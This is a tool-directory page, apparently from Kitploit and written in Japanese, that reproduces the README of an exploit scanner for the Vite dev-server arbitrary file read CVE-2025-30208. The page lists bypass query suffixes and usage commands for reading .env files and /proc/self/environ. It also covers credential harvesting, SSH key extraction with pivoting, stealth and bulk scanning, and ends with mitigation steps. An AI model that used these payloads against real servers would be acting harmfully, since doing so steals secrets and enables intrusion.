Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-30208 — CVE-2025-30208(Vite任意ファイル読み取り)用エクスプロイトスキャナー。多変種バイパス検出、資格情報収集、SSHキー抽出、および許可された侵入テスト用の構造化レポートを備えています。 | Kitploit
ツール/GitHubGitHub/hazavvip/cve-2025-30208
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出情報収集ペネトレーションテスト
GitHubhazavvip/cve-2025-30208

CVE-2025-30208

CVE-2025-30208(Vite任意ファイル読み取り)用エクスプロイトスキャナー。多変種バイパス検出、資格情報収集、SSHキー抽出、および許可された侵入テスト用の構造化レポートを備えています。

リポジトリを見る
224ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-30208 — Vite 任意ファイル読み取り · v5

CVE: CVE-2025-30208
GHSA: GHSA-x574-m823-4x7w
重要度: CVSS 5.3 中程度(ネットワークからアクセス可能な dev サーバー)

⚠ 認可されたセキュリティエンゲージメント専用です。
所有していない、または明示的な書面によるテスト許可を得ていないシステムに対する無許可の使用は違法です。


説明

Vite の dev サーバーは、/@fs/ リクエストを介してホストファイルシステムから任意のファイルを提供できます。
影響を受けるバージョンではクエリ文字列のサニタイズチェックが欠如しているため、攻撃者は特別に細工されたサフィックスを追加して許可リストをバイパスし、プロセスがアクセスできる任意のファイル(.env ファイル、SSH秘密鍵、クラウド資格情報、/proc エントリなど)を読み取ることができます。


影響を受けるバージョン

ブランチ最終脆弱バージョンパッチ適用済み
6.3.x6.3.06.3.1+
6.2.x6.2.26.2.3+
6.1.x6.1.16.1.2+
6.0.x6.0.116.0.12+
5.4.x5.4.145.4.15+
4.5.x4.5.94.5.10+

バイパスバリアント

名前サフィックス / クエリ説明
raw???raw??末尾の ?? が rawRE を破壊する
import&raw???import&raw??ES モジュール + raw の組み合わせ
raw??raw?末尾の ? が1つだけ
url&raw???url&raw??URL モードとの組み合わせ
raw&url???raw&url??パラメータ順序の逆転
import&?raw?import&?raw不正な import プレフィックス
sec-fetch?raw + Sec-Fetch headerブラウザスクリプトコンテキスト
raw-encoded?raw%3f%3fURL エンコードされた区切り文字
double-slash?raw??/ダブルスラッシュのサフィックスによるバイパス(v5)
pct-all%3fraw%3f%3f完全にパーセントエンコードされたクエリ(v5)
raw-hash?raw??#フラグメントアンカーによるバイパス(v5)
wasm-init?inline=1.wasm?initCVE-2025-31125 の関連脆弱性(wasm init)

インストール

pip install requests
# or
pip install -r requirements.txt

使用方法

単一ターゲット — フルスキャン

python main.py -t https://target.com

完全なエクスプロイトチェーン(ライブ資格情報検証、デフォルト動作)

python main.py -t https://target.com --full-chain --output /tmp/report

特定ファイルの読み取り

python main.py -t https://target.com --file /app/.env
python main.py -t https://target.com --file /proc/self/environ --save ./environ.txt

ステルスモード(ランダム遅延)+ アップストリームプロキシ

python main.py -t https://target.com --stealth --proxy http://127.0.0.1:8080

ターゲットリストからのバルクスキャン

python main.py -l targets.txt
python main.py -l targets.txt --workers 20 --ports 5173,3000,8080

パイプ処理に適した出力(ANSI コードなし)

python main.py -t https://target.com --no-color | tee scan.log

バージョン

python main.py --version

パッケージとして実行

python -m cve30208 -t https://target.com

CLIリファレンス

フラグデフォルト説明
-t/--target—単一ターゲットのURL
-l/--lists—1行に1ターゲットを記載したファイル
--stealthoffリクエスト間にランダムな遅延を追加
--proxy—HTTP/HTTPS プロキシ(http://host:port)
--timeout10リクエストごとのタイムアウト(秒)
--verifyoffTLS証明書の検証を有効化
--file—ターゲットホスト上の特定パスを読み取る
--save—--file の内容をローカルパスに保存
--full-chainon完全なエクスプロイトチェーンを実行(ライブ検証がデフォルト)
--output—JSON + Markdown レポートをこのベースパスに書き出す
--workers10バルクスキャンの並列ワーカー数
--ports下記参照バルクモードでプローブするポートのカンマ区切りリスト
--no-color/--plainoffANSI カラーコードを無効化
--safe-modeoff端末出力のシークレット値を伏せ字にする
--show-secretsoff端末にシークレットを完全表示(--safe-mode を上書き)
--version—バージョンを表示して終了

バルクスキャンのデフォルトポート: 5173, 4173, 3000, 8080, 8000, 4000, 5000, 9000, 80, 443


出力

--output /tmp/report が指定されると、スキャナーは以下を書き出します:

  • /tmp/report.json — 機械可読な構造化された検出結果
  • /tmp/report.md — 人間が読みやすいMarkdownレポート

バルクスキャンは、シェルスクリプトを容易にするため、常に最終行に VULN_COUNT=N を出力します:

python main.py -l targets.txt | grep '^VULN_COUNT='

単一ターゲットスキャンは、自動化のために最後に SCAN_STATUS=VULNERABLE|NOT_VULNERABLE を出力します。


アーキテクチャ(v5)

cve30208/
├── __init__.py      — public API surface
├── __main__.py      — python -m cve30208 entry point
├── constants.py     — BYPASS, CVE_SIBLING, SECRET_PATTERNS, SSH/scan constants
├── ui.py            — ANSI colour codes, Spin/NullSpin, terminal helpers
├── utils.py         — shared helpers (_unescape_js_string)
├── secrets.py       — scan_secrets(), parse_env(), parse_environ()
├── ssh.py           — extract_ssh_key(), collect_ssh_targets()
├── exploit.py       — ExploitResult, ExploitStage (live credential validation)
│                      includes a check registry for easier extension
├── report.py        — save_report(), make_md()
└── scanner.py       — FR/R dataclasses, Scanner, bulk_scan(), main()
main.py              — backwards-compatibility shim
requirements.txt

重複排除

スキャナーは反復する成果物を自動的に抑制するため、HOME が /root と等しい場合や、同じシークレットが複数のファイルに出現する場合でも出力はクリーンに保たれます:

レイヤーメカニズム
ファイルシステム読み取りstage_fs は dict.fromkeys でSSHキーのベースリストを正規化し、出力が生成される前に reads キューから重複パスを削除します。
ファイル保存Scanner._save はスキャンごとの _seen_file_paths セットを確認します。重複パスは r.files に再追加せず、既に保存されている FR を返します。
シークレットScanner._save は全ファイルにわたって r.secrets を (name, value) でグローバルに重複排除します。ファイル内の重複排除は scan_secrets で別途処理されます。
SSHキーstage_ssh は複数のソースファイルに出現する、同じPEM署名(先頭 _PEM_SIG_LEN バイト)を持つキーをまとめます。
ピボットコマンドピボットブロックは (key_source, host, port) をキーとし、同一の組み合わせは一度だけ出力されます。

サマリー行は、重複として抑制されたファイル、シークレット、SSHキーの数を報告します。例:

  deduped     2 file(s), 4 credential(s), 1 SSH key(s) suppressed as duplicates

修正と対策

  1. 使用中のブランチに対応するパッチ適用済みバージョンに Vite をアップグレードします(上の表を参照)。
  2. 信頼できないネットワーク上で --host 0.0.0.0 を指定して Vite dev サーバーを起動することは絶対にしないでください。
  3. 潜在的に露出した可能性のあるすべてのシークレット(APIキー、DBパスワード、SSHキー)をローテーションしてください。
  4. .env ファイルを監査し、プロジェクトから不要なシークレットを削除してください。

法的注意事項

このツールは認可されたペネトレーションテストおよびセキュリティ研究専用として提供されます。
このツールを使用することで、ターゲットシステムをテストする明示的な書面による許可を得ていることに同意したものとみなされます。
著者は、本ソフトウェアによって引き起こされた誤用または損害について一切の責任を負いません。


CVE-2025-30208 PoC v5

JSONスキーマに関する注記

生成されるJSONには現在以下が含まれます:

  • schema_version(現在: 1.0.0)
  • status(VULNERABLE または NOT_VULNERABLE)
  • safe_mode(端末のシークレット伏せ字モードが有効な場合 true)
  • report_redacted(少なくとも1つのシークレットが存在し、保存されたレポートで伏せ字にされた場合 true)
  • 保存されるシークレット値は、JSON/Markdown レポートファイル内では常に伏せ字にされます
ツールをダウンロード